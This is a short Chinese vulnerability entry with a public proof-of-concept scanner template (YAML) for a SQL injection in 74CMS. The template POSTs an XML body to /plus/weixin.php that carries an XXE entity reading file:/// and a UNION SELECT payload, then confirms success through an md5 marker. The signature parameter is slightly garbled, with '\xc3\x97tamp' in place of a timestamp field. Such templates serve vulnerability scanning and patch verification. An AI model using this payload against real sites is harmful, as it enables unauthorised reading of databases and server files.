漏洞描述
74cms-sqli-1 app="骑士-74CMS"
74cms-sqli-1: 74 CMS SQL 注入漏洞
PoC代码[已公开]
id: 74cms-sqli-1
info:
name: 74 CMS SQL 注入漏洞
author: betta
severity: high
verified: true
description: |-
74cms-sqli-1 app="骑士-74CMS"
reference:
- https://www.uedbox.com/post/29340
tags: 74cms,sqli
created: 2025/03/21
set:
rand: randomInt(200000000, 210000000)
rules:
r0:
request:
method: POST
path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
headers:
Content-Type: text/xml
body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
follow_redirects: false
expression: response.body.bcontains(bytes(md5(string(rand))))
expression: r0()